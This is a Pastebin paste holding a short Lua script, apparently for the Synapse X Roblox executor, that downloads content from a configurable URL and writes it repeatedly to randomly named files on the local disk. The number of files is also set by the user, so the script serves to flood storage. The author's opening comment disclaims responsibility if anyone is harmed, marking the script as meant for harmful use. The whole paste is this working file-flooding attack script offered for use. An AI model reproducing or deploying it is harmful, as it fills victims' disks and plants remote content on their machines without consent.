Advertisement
SalamieLP1

fckhimup

Oct 24th, 2020
605
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.63 KB | None | 0 0
  1. --im not responibel if anyone getting harmed with this script
  2.  
  3. local content = syn.request(
  4.    {
  5.        Url = _G.link,
  6.        Method = "GET"
  7.    }
  8. )
  9.  
  10. local chars = "ABCEDFGHIJKLMNOPQRSTUVWYZabcdefghijklmnopqrstuvwxyz1234567890"
  11. --The characters that can be used in the code. You can add symbols too if you want.
  12.  
  13. local function getCode(length)
  14.     local code = ""
  15.     for i = 1, length do
  16.         local randNum = math.random(1, chars:len())
  17.         code = code .. chars:sub(randNum, randNum)
  18.     end
  19.     return code
  20. end
  21.  
  22. for count = 1, _G.Amout do
  23. writefile(getCode(math.random(_G.chars))..'.'..getCode(math.random(_G.chars2)), content.Body)
  24. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement